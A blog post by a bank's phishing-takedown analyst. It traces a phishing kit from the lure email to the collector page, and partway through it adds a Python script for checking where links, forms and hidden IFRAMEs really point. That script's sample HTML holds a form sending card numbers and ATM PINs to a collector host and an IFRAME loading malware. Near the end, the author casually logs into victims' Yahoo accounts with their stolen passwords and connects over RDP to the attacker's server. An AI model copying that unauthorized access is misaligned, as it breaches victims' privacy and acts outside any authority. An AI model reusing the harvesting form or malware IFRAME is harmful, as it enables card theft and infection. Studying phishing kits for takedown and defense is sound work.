A Phishy Story

Phishing takes its name from fishing, and the comparison holds: phishers are to internet users what fishermen are to fish. Shoals of fish caught in nets are no different from internet users being phished through their own inboxes and instant messengers. Phishers have some personal favourites: personal information, credit card numbers, debit card numbers with ATM PINs, and so on. Though phishing has been around for a long time, it became more prominent back in 2003. You can read more on the big scams here.

How does it all work?

A typical modus operandi:

1) The phisher would either go out and buy a phishing kit from the underground channels or create a look-alike page himself.

2) He would then need hacked websites or a server where the pages can be hosted. This too is easily obtained. He would pay or trade for a list of hacked websites on IRC channels, underground forums, etc.; these are very common sources for such deals. He could also target systems exposed to a particular vulnerability or weakness in the website: a vulnerability in the hosting provider's control panel software, an exploit for a popular CMS like Joomla, a 0day vulnerability in the web server, etc. A zero-day (or zero-hour) attack or threat is a computer threat that tries to exploit computer application vulnerabilities that are unknown to others, undisclosed to the software vendor, or for which no security fix is available. (ref: http://en.wikipedia.org/wiki/Zero_day_vulnerability)

3) Once the hacked infrastructure is ready, it's time to spam. They send out emails in large volumes. These emails are crafted to perfection: they carry the company logo, an appealing message, and the same CSS as the company being phished. All of this together makes it look perfect. It's like decorating the devil's face with cosmetics to make it look innocent; the devil is still there under a thin layer of cosmetics. The email carries a crafted link whose visible text looks legitimate while the hyperlink actually points to the website where the pages are hosted.

However, the entire process is a gamble: some may fall prey to the phish net while others may not. Over the years, phishing scams have grown from simply stealing accounts into far more dangerous criminal intent. Assuming the user has fallen into the net, let us understand the ways in which a phisher can harvest the victim's data. There are various ways in which this can be done.

1) The attacker uses the services of websites that let you send HTML forms embedded in your email. On submitting this HTML form, the phished page redirects you to the legitimate website. This often tricks the user: they don't realise what just happened. The details entered on the form are emailed to the phisher's inbox, which is set up to collect them. The most common place you see such email-embedded forms is in advertising on the internet.

2) Second, the email is scripted in a way that tempts or forces the user to visit the copied website. The attacker can also combine this with the tactic mentioned above and use services like www.emailmeform.com: he creates an account there and wires his entire phished page up to their service, which captures the details and then emails them to him. This is the most common method used by phishers. The pages are also scripted in server-side languages like PHP, .NET, JSP, etc., so that neither the modus operandi nor the attacker's identity or any other details are exposed in the page source.

3) The third type is where the phisher uses nothing like the above and instead writes all the captured data to a predefined file on the server. In this way he needs no email address or any of the services mentioned above to capture the user's details. This is exactly what I am going to write about.

Since I had some time off before I could start with the next takedown, I decided to dig further. Before we begin, let me give you a brief on our service and the client. We offer takedown services to a large public sector bank. We have a strict timeline of 24 hours for every takedown. Every time a customer or their monitoring reports a phished page, we have to take down the site to prevent the loss of financial and other details. While doing takedowns I also get a chance to research and understand the modus operandi behind the operation. It is very interesting.

I had just started my day checking my email over a cup of coffee. I received a new email on Tue 11/3/2009 10:22 AM about a phished link being up, with the URL, and we needed to start the takedown immediately. He also sent me a sample email. We did the usual process and the link was down by noon. Have a look at a sample phishing email.

The email looks so real. It has the logo of the customer and a perfect login URL. On hover I found it was actually pointing to some server in Russia. The page 'retails.html' simply redirects to the next URL, where the phished page is hosted. Have a look at the closing lines of the email below. The phisher uses a pressure tactic that will force the user to browse to the URL.

OK, I now click and I am redirected to the URL http://200.119.X.X/retail/login.php. The page looks like this:

I then enter some fake details on this page and press the Enter key. I am now redirected to another page called 'accounts.php' on the same domain. I quickly check the HTML source code (view source) of the page for the form tag. This is where I would see where the page is going on hitting 'submit'. I am now redirected to another page hosted on a hacked domain, hxxp://stirileprotv.fnhost.org/bi/ib.php.

I go a level up in the URL hxxp://200.119.X.X/retail/login.php and now I see the directory listing. I see 2 files under the retail folder, namely 'login.php' and 'accounts.php'. Directory listing has been common in all my takedowns; they don't really care about directory listings. What I also observed at the bottom of the 'accounts.php' page is more interesting. The page has an IFRAME with src pointing to http:// statanalyze. cn /lib/ index.php. This is some malware getting downloaded onto the victim's system.

My antivirus immediately pops up an alert that malware is getting downloaded, and it immediately blocks it. Coming back to 'accounts.php', it asks for my name, email address, credit card number, ATM PIN and expiration date. On entering some fake details I am now redirected to a third domain, hxxp://stirileprotv.fnhost.org/bi/ib.php, and from 'ib.php' it redirects me to the legitimate page of my client's website. I have changed that to hxxp://www.google.com in the code snippet. Aren't these guys sick of so many redirections? Not really; they have a smart modus operandi. They don't use one domain to complete their operation.
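The checks walked through above (hovering the lure's link, viewing the landing page's source for the form target, spotting the hidden IFRAME and the final redirect to the legitimate site) can be scripted for takedown triage. The following is an added example in Python and is not code from the original post or from the phishing kit it describes. The sample email and page HTML are constructed here to mirror what the post reports: 203.0.113.7 stands in for the masked 200.119.X.X host, www.examplebank.example is a placeholder for the client's real domain, and the collector and IFRAME hostnames are the ones the post quotes.

```python
"""Takedown triage helpers: where does a lure email really point, and where
does the landing page really send the data?  Added example, not code from the
original post.  Sample HTML below is constructed to mirror the post; 203.0.113.7
stands in for the masked 200.119.X.X host and www.examplebank.example for the
client's real domain."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Field-name fragments that mean a form is harvesting more than a login.
SENSITIVE = ("pin", "card", "cvv", "pass", "pwd", "account", "exp")


class _Collector(HTMLParser):
    """Collect anchors, forms (with input names), iframes and meta-refresh hops."""

    def __init__(self):
        super().__init__()
        self.anchors, self.forms, self.iframes, self.refreshes = [], [], [], []
        self._href, self._text = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a":
            self._href, self._text = a.get("href", ""), []
        elif tag == "form":
            self.forms.append({"action": a.get("action", ""), "fields": []})
        elif tag == "input" and self.forms:
            self.forms[-1]["fields"].append(a.get("name") or "")
        elif tag == "iframe":
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            self.iframes.append({"src": a.get("src", ""), "hidden": hidden})
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            content = a.get("content") or ""
            i = content.lower().find("url=")
            if i >= 0:
                self.refreshes.append(content[i + 4:].strip())

    def handle_data(self, data):
        if self._href is not None:          # only text inside an <a> matters
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.anchors.append((self._href, "".join(self._text).strip()))
            self._href = None


def host(url):
    return (urlsplit(url).hostname or "").lower()


def lure_findings(email_html, legit_host):
    """Links whose href leaves the legitimate domain; 'claims_legit' marks the
    classic trick of showing the bank's own URL as the visible link text."""
    c = _Collector()
    c.feed(email_html)
    return [{"text": text, "href": href, "host": host(href),
             "claims_legit": legit_host in text.lower()}
            for href, text in c.anchors if host(href) and host(href) != legit_host]


def page_findings(page_url, page_html, legit_host):
    """Resolve every form action, iframe src and meta-refresh target relative
    to the page and note when it hops to another host (the kit's collector,
    a malware loader, or the legitimate site at the end of the chain)."""
    c = _Collector()
    c.feed(page_html)
    page_host, out = host(page_url), []

    def add(kind, target, **extra):
        target = urljoin(page_url, target)
        out.append({"kind": kind, "target": target,
                    "off_host": host(target) != page_host,
                    "to_legit": host(target) == legit_host, **extra})

    for f in c.forms:   # an empty action means the form posts to itself
        add("form", f["action"] or page_url,
            sensitive_fields=[n for n in f["fields"]
                              if any(k in n.lower() for k in SENSITIVE)])
    for fr in c.iframes:
        add("iframe", fr["src"], hidden=fr["hidden"])
    for r in c.refreshes:
        add("refresh", r)
    return out


# --- constructed samples (not captured data) ---------------------------------
LURE = """<p>Dear customer, your account will be suspended within 24 hours.</p>
<a href="http://203.0.113.7/retails.html">https://www.examplebank.example/login</a>
<a href="https://www.examplebank.example/help">Help</a>"""

ACCOUNTS_URL = "http://203.0.113.7/retail/accounts.php"
ACCOUNTS = """<form action="http://stirileprotv.fnhost.org/bi/ib.php" method="post">
Name <input name="name"> Email <input name="email"> Card <input name="cardno">
ATM PIN <input name="atmpin"> Expiry <input name="expiry"> <input type="submit">
</form>
<iframe src="http://statanalyze.cn/lib/index.php" width="0" height="0"></iframe>"""

IB_URL = "http://stirileprotv.fnhost.org/bi/ib.php"
IB = '<meta http-equiv="refresh" content="0; url=http://www.google.com/">'

if __name__ == "__main__":
    legit = "www.examplebank.example"
    print(*lure_findings(LURE, legit), *page_findings(ACCOUNTS_URL, ACCOUNTS, legit),
          *page_findings(IB_URL, IB, legit), sep="\n")
```

Run against the constructed samples it reports the three things the post found by hand: a lure link that displays the bank's URL but resolves to 203.0.113.7, an accounts.php form that posts card number, ATM PIN and expiry to a different host, and a zero-size IFRAME pulling content from a third host. Feeding it real pages means fetching them from an isolated analysis box, since the IFRAME target is the malware loader.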

I again go a level up on http://stirileprotv.fnhost.org/bi/ib.php. What I happen to find is something even more interesting. It had a page 'ib.php' under the ib folder and a .txt file. When I tried accessing the file, what I found was the actual account details of the people who had fallen prey to the trick: their usernames, credit card numbers, internet banking IDs and passwords. Check the file snippet below.

I then contact the client to freeze the accounts and get in touch with the hosting providers. I make sure I ask the hosting providers to provide me with the pages, as they aid my research in understanding the various modi operandi out on the pr0wl. Most of the time they don't give the pages, but this time I was lucky. The tech support guys actually emailed me the contents of the ib folder. Have a look at the PHP code.

Let me explain the code in brief. It opens a stream to a file called x-account-all.txt and then captures the POST variables submitted from the URL http://200.119.X.X/retail/accounts.php. The following table explains what each variable means.

I thought that was it. I was done with my research. I relaxed a bit and stretched my arms. But hold on, readers: I recollect that the website was also vulnerable to IFRAME injection. No more research on this malware, guys; I have a colleague who enjoys this. I will send this to him. Until he comes up with his analysis, there are some who have already done it. Check the links below.

http://wepawet.iseclab.org/view.php?hash=363c95666cf1e80072656c7b562c4dbb&type=js

http://anubis.iseclab.org/?action=result&task_id=1c109b3e2cc07d1f49168943cc884e1d2

http://www.virustotal.com/analisis/837508d65acc78ec684c0d7a907bea7f49ce223052a18a076240018fc61a0d7f-1257141946

I was still way too itchy to put a full stop to it. I picked some arbitrary entries from the file and picked the 'ea' and 'bb' fields. Why only them? (I got this particular combination after trying out a few.) I was able to log in to the Yahoo accounts of the victims, since the password used was the same for both accounts. I then checked the spam box and found the email that the victim had received. There were similar emails, and to my surprise I found another URL hosting the phished page. OK guys, that's it, I need to get back to my next takedown immediately. Oh! By the way, this time it is some Windows 2003 server behind an ADSL router running the phished page on a XAMPP server. I did RDP to the box; 3389 was found open. I will come back if I find something more interesting.

All the details in this post have been changed or renamed to protect the real identity of our client.

Adios!
Taufiq Ali
